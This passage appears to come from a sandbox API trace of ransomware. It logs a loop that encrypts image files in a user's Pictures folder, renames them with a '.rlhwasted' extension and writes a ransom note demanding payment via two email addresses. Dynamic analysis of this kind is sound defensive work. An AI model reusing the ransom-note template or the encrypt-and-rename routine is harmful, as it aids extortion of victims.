lpFileSizeHigh=0x12afe94*=0x0) returned 0x6555 [0196.502] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6555) returned 0x6a0000 [0196.502] CloseHandle (hObject=0x128) returned 1 [0196.505] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.505] CloseHandle (hObject=0x12c) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.505] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.506] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.506] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.507] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.523] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.523] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.532] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.532] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fKOomCVfO8iPCuisGIns99ydJGM887dxghm0d6WcfCCDmqKbgCx7guLUwoTPO7l6\r\npbccYtYhAYUpNbIgh9Jv8THW72iSVqQwKF359c4pk4fXbiNKSzA6OIcCBxDYxIEU\r\nXR2VRMmVoySpgaOCq0p/giwQCGouKEzLESaUCbzQ61pSOEYXu4BIJhHVTpy8gNs8\r\ntOq4h4mB7LzaeL08EuvQ+F5eDNzPHzftM6FUW1tL+ZP/Ytx0bPW21AoRiJos0oO7\r\n5zUQ+SHW7chyldvLpXsJLtOsqCbfL2RUy38mfOwXKblFYtMwzKa/YJ24BhXSF4qg\r\n63u3/Wzcnw+CtyM0UontPIOiBeweG/DRGyo5FebmGWwdXqWtu7kwsRJ+g7n1R/Bd\r\npho1epymmB+osNu15GbCZWLPWpTp8OK3zmjwR26DUxXhnhqs5IJL+UVvyXaA53Hf\r\nTJBkKJaoO7PZtjAKSxhkH9B+eOi+cSMt2cTrJaaJuFkmvac5kU3uz5sHOLrrl2om\r\nf0w30C3i2wi+zBEaehA2BhtJw96rTHDHOev3dHa+n3Gk6Taj8GzIb+QW+sGN9SGb\r\nknIgnKkptEwyDgJG+qEyLWFuDKqTx/MHkiENN1MKGRbM7+zwG2bMHho+OR30LzxC\r\niKUNO4tdKL1kUuji+ZsH/4qJIMxJU3v3V6QodltKBth=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.532] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.532] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.533] SetEndOfFile (hFile=0x124) returned 1 [0196.535] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.535] CloseHandle (hObject=0x124) returned 1 [0196.537] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.538] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70afe8 | out: hHeap=0x6b0000) returned 1 [0196.538] _aulldvrm () returned 0x0 [0196.538] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.539] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.539] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\wN8c.bmp") returned 66 [0196.539] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6d4580 [0196.539] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.539] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.539] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.541] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.541] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\wN8c.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\wn8c.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.541] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.543] SetEndOfFile (hFile=0x124) returned 1 [0196.543] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.543] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.543] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\wN8c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\wn8c.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\wN8c.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\wn8c.bmp.rlhwasted")) returned 1 [0196.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\wN8c.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\wn8c.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.544] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.545] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xfd4b [0196.545] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd4b) returned 0x6a0000 [0196.545] CloseHandle (hObject=0x12c) returned 1 [0196.549] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.550] CloseHandle (hObject=0x128) returned 1 [0196.550] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.550] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.551] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.551] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.551] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.552] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.552] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.561] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.561] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LLX5NjZdy3gYicI0HDTA7IBpzSNk1z+M+jx/9P6eA0adg20oXO1ROs0vON5B6QgG\r\n0OFTYDPCi6tlf5koZOkGSnU4rCcjTYc7PmTssqy2XzgS/TkBkS3PpHxq6r6KVK8b\r\nlqIQRN/zK0Wrl1wzR2ZVWNg6PwaIJeiv3niyDDOFiBEkb4azqBf89JWwGLv3XIGw\r\nryRnbQW4YrTyf1GNkig8Ck3rJAmNi8wfsVrnZ5TOKGlwRceYBzazMJPOrbDGaXR2\r\nXisbnRxiCnFX2MMNC1oChIVXRwp5+RT/ljvxktslgsWCBYr/X78weaAgWmjgBA1N\r\nGtNDaKRk5nptHSVpaVjyhaOtU4nbVyoRaWm0it1n3T5ynwEBTjGGuSmkMdGrIbyv\r\nizKclfK+THMriKG/zRAwL3EZRJ1L8kGS3pHj8Uy7CMdY9OYFDQeV1H4xMz3LaaGE\r\nTNQuncl9F2it26dg4X7A5d1V7yupul3arIQ9VUCfeFLEGcL2LeQC0DNzUX8qjeLA\r\nry/gFqpCNwQ9sdheaaskb6I1ighnmgggN4yfEK3LzRwYcVtzGxT1bQx8MzCHdDrL\r\nsX1TCsXx7o7BLt3hctyEV8h7I85mBCppSWaz2MNjyAvPZB4TX+g4acY1R7h6orex\r\nE3rCuxo6H9Om6P8IrrPHokxawBXCbLqyM6priJPSZ4X=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.562] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.562] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.562] SetEndOfFile (hFile=0x124) returned 1 [0196.564] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.564] CloseHandle (hObject=0x124) returned 1 [0196.566] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.566] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2230 | out: hHeap=0x6b0000) returned 1 [0196.566] _aulldvrm () returned 0x0 [0196.566] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.567] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.567] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dvvAeBv.gif") returned 54 [0196.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6d4580 [0196.567] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.567] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.567] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.568] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dvvAeBv.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dvvaebv.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.568] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.569] SetEndOfFile (hFile=0x124) returned 1 [0196.617] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.617] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.617] lstrcpyW (in: lpString1=0x6d45ec, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dvvAeBv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dvvaebv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dvvAeBv.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dvvaebv.gif.rlhwasted")) returned 1 [0196.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dvvAeBv.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dvvaebv.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.618] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.618] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xc17e [0196.618] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc17e) returned 0x6a0000 [0196.618] CloseHandle (hObject=0x108) returned 1 [0196.621] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.621] CloseHandle (hObject=0x128) returned 1 [0196.621] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8b00 [0196.621] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f98) returned 1 [0196.622] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6e8b48 | out: pbBuffer=0x6e8b48) returned 1 [0196.622] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.622] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f98) returned 1 [0196.623] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.623] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.631] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0196.631] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8b00 | out: hHeap=0x6b0000) returned 1 [0196.631] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.631] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ovx20g1uct5R8rl+pR3Vl8plDzzMMmy2otvGz2TmCuiB61IzeK4XaUzIqE9VMULb\r\nbXPFMUxuenuxvLb/qmGsf0yIH0+A56RQAuh+/K/a13B9DtXs8TObb7qorOTLSUxS\r\nIQwm9wP4RA5u44cuG9TG6PhdFq9uF2l45fwYr4jN0fKwmHo8ergRMcue0QXnORW9\r\nqTOWUQDfBofd4OSrwZUKLTZgDEbpeusMp3ZFNoWA2J5sZlau7ifUXY38z6IIncQV\r\nXgl1Wdnn62QKtCLRQeKiGCWxblilBEfnZvpmWFsMH3wkY1shpqXl3lZ6nQEcYe98\r\nIhlDgQo9bFJlbl0cD9poqMmulC65c9mLvtg99rWEoCLubeh6hETvg7vbeKIoDfMn\r\nIG+MBX+V+i2CxK2CMN5rUDyVsk6AgJeCLWIklEMLHawL7GGMELIrAtm1CjLpZdHZ\r\nFF7wgXqMi1S4srSWh896+kR5hwt8IYiLoZ+TdPeAWe7asqZZFVg4MAtAM1YZXxkv\r\n9O+mTRo9ZScER611x2v6UhJp3XBlwJyPjP8OnJinLLhBjZRkeY8aw9peDQ2H856o\r\ncclf6H2Cfh0KqTf88g7p/A2qPNHpggvposWzqAf9bu64To8q+eoDZA1mCvoZlrXh\r\nu+eaP4IcNYTqKh6hd46g9s572i+YgKiPh5GXlqBaFFZ=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.631] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0196.631] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.631] SetEndOfFile (hFile=0x124) returned 1 [0196.634] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.634] CloseHandle (hObject=0x124) returned 1 [0196.635] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.636] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0718 | out: hHeap=0x6b0000) returned 1 [0196.636] _aulldvrm () returned 0x0 [0196.636] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0196.636] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.636] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.636] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\5FmG.png") returned 59 [0196.637] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6d4580 [0196.637] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.637] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.637] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0196.637] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.637] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\5FmG.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\5fmg.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.638] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.639] SetEndOfFile (hFile=0x124) returned 1 [0196.639] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.639] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.639] lstrcpyW (in: lpString1=0x6d45f6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\5FmG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\5fmg.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\5FmG.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\5fmg.png.rlhwasted")) returned 1 [0196.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\5FmG.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\5fmg.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.640] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.640] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x17d9b [0196.640] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17d9b) returned 0xb00000 [0196.640] CloseHandle (hObject=0x128) returned 1 [0196.645] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.646] CloseHandle (hObject=0x108) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8b00 [0196.646] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f98) returned 1 [0196.646] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6e8b48 | out: pbBuffer=0x6e8b48) returned 1 [0196.646] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.646] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f98) returned 1 [0196.647] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.647] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0196.655] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8b00 | out: hHeap=0x6b0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.655] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 